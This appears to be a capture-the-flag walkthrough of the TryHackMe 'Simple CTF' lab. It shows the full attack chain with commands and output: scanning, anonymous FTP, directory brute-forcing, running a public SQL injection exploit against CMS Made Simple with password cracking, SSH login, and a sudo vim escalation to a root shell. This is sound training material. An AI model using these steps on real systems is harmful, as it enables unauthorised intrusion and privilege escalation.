Simple CTF
This is a free TryHackMe CTF room created by MrSeth6797 that looks to answer a series of questions as you navigate through a server hosting a CMS.
The room looks to capture a couple of things as you make your way towards identifying the user and root flags:
- The number of services running under port 1000.
- The service running on the higher port.
- The CVE that can be used against the application.
- The type of vulnerability the application is vulnerable to.
- The user account and password that can be used to access the server.
- Any additional home directories other than the user account identified previously.
- The application that can be used to escalate privileges.
We will come across each of these as we move through the walkthrough.
For the purposes of this room:
- I may redact certain outputs. For this, I shall use #REDACTED.
- I shall use $VICTIM_IP to indicate the IP of the CTF virtual machine. You can replace this with the actual IP.
With all that said, let’s launch the virtual machine and get started!
What services exist on the server?
> nmap -sC -sV $VICTIM_IP
Starting Nmap 7.60 ( https://nmap.org ) at 2022-01-25 10:42 GMT
Nmap scan report for ip-10-10-71-122.eu-west-1.compute.internal ($VICTIM_IP)
Host is up (0.00043s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.172.4
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 5
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/ /openemr-5_0_1_3
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
| 256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
|_ 256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (EdDSA)
MAC Address: 02:01:A0:71:4F:45 (Unknown)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.10 seconds
From the scan, we have identified 3 services that are running - ftp on Port 21, http on port 80 and ssh on port 2222.
Question 1 : How many services are running under port 1000?
#REDACTED
Question 2: What is running on the higher port?
#REDACTED
Let’s explore the FTP service
From the results, we can see that ftp allows for anonymous login, and through this service, we have access to a text file that tells us some important inforamtion about one of the users - his password is weak. This gives us confidence that we could possibly run a dictionary attack against his credentials to gain access to the server.
> ftp $VICTIM_IP
Connected to $VICTIM_IP.
220 (vsFTPd 3.0.3)
Name ($VICTIM_IP:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Aug 17 2019 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 166 Aug 17 2019 ForMitch.txt
226 Directory send OK.
ftp> get ForMitch.txt
local: ForMitch.txt remote: ForMitch.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for ForMitch.txt (166 bytes).
226 Transfer complete.
166 bytes received in 0.00 secs (360.2431 kB/s)
ftp> exit
221 Goodbye.
>cat ForMitch.txt
Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!
Let’s explore the HTTP service
Considering that a http web service is running as well on port 80, we can see from the nmap output that there’s also a robots.txt file that includes a disallowed entry. Navigating to this folder on the browser leads us to a “Not Found” page.
Enumerating the root directory and the subsequent directory simple that we discover, we are able to identify a number of directories and file, including the index.php file for the CMS being hosted on the server:
> gobuster dir -u $VICTIM_IP -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://$VICTIM_IP
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2022/01/25 11:07:27 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.html (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
/simple (Status: 301)
===============================================================
2022/01/25 11:07:30 Finished
===============================================================
# Let's do a second gobuster against the 'simple' directory that we discovered
>gobuster dir -u $VICTIM_IP/simple -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://$VICTIM_IP/simple
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2022/01/25 11:07:53 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/admin (Status: 301)
/assets (Status: 301)
/doc (Status: 301)
/lib (Status: 301)
/modules (Status: 301)
/index.php (Status: 200)
/tmp (Status: 301)
/uploads (Status: 301)
===============================================================
2022/01/25 11:07:54 Finished
===============================================================
Navigating to the index.php in the browser takes us to the CMS main page. A quick search on the site shows us:
- how to navigate to the admin log in panel.
- the version of the CMS.
A quick search for vulnerabilities using searchsploit indicates a possible vulnerability that can be exploited gain access to the CMS, and by reading to the .py file, we can identify the CVE from the notes that the vulnerability refers to:
> searchsploit CMS Made Simple 2.2.8 2 тип
---------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------- ---------------------------------
CMS Made Simple < 2.2.10 - SQL Injection | php/webapps/46635.py
---------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
> find / -name "46635.py" -exec head -n 10 {} \; 2>/dev/null
#!/usr/bin/env python
# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9
# Date: 30-03-2019
# Exploit Author: Daniele Scanu @ Certimeter Group
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
# Version: <= 2.2.9
# Tested on: Ubuntu 18.04 LTS
# CVE : #REDACTED
Question 3: What’s the CVE you’re using against the application?
#REDACTED
Question 4: To what kind of vulnerability is the application vulnerable?
#REDACTED
On reading this code, running this vulnerability requires a couple of things to be present on your machine:
- A version of the Python 2 interpreter.
- Python modules that include requests, termcolor, time, optparse and hashlib for Python Version 2.
In case you are lacking any of these modules, you can use pip2 to install them, or search in your linux distribution’s package management tool to find the appropriate packages compatible with Python version 2.
With that out of the way, you should be able to run the vulnerability script [which in my case is 46635.py] with the following arguments:
> python2 /opt/searchsploit/exploits/php/webapps/46635.py -u http://$VICTIM_IP/simple -w /usr/share/wordlists/rockyou.txt --crack
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
[+] Password cracked: #REDACTED
Question 5 : What’s the password?
#REDACTED
Let’s explore the SSH service
With a username and password, we can attempt to access the server over SSH [on port 2222]. Once we are in, we can:
- List the contents of the user’s home directory to identify the user flag.
- List the contents of the home directory to identify other potential users of the system.
> ssh mitch@$VICTIM_IP -p 2222
...
Warning: Permanently added '[$VICTIM_IP]:2222' (ECDSA) to the list of known hosts.
mitch@$VICTIM_IP's password: # Insert password here
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
> ls -la
total 36
drwxr-x--- 3 mitch mitch 4096 aug 19 2019 .
drwxr-xr-x 4 root root 4096 aug 17 2019 ..
-rw------- 1 mitch mitch 178 aug 17 2019 .bash_history
-rw-r--r-- 1 mitch mitch 220 sep 1 2015 .bash_logout
-rw-r--r-- 1 mitch mitch 3771 sep 1 2015 .bashrc
drwx------ 2 mitch mitch 4096 aug 19 2019 .cache
-rw-r--r-- 1 mitch mitch 655 mai 16 2017 .profile
-rw-rw-r-- 1 mitch mitch 19 aug 17 2019 user.txt
-rw------- 1 mitch mitch 515 aug 17 2019 .viminfo
> cat user.txt
#REDACTED
> ls ../
mitch #REDACTED
Question 6: Where can you login with the details obtained?
#REDACTED
Question 7: What’s the user flag?
#REDACTED
Question 8: Is there any other user in the home directory? What’s its name?
#REDACTED
A quick examimation of the commands the user can run as sudo indicate that they can run the tool vim. With this, we can execute vim as a root user and subsequently spawn a bash shell with these rights from vim. We can then proceed to navigate to the root user’s home directory and get the final flag.
> sudo -l
User mitch may run the following commands on Machine:
(root) NOPASSWD: /usr/bin/vim
> sudo /usr/bin/vim
# Within vim, press the ":" to enter into execute mode to run commands. From here, you can run "!bash" and it will drop into a privileged shell with root permissions.
> cat /root/root.txt
#REDACTED
Question 9: What can you leverage to spawn a privileged shell?
#REDACTED
Question 10: What’s the root flag?
#REDACTED
And we are done!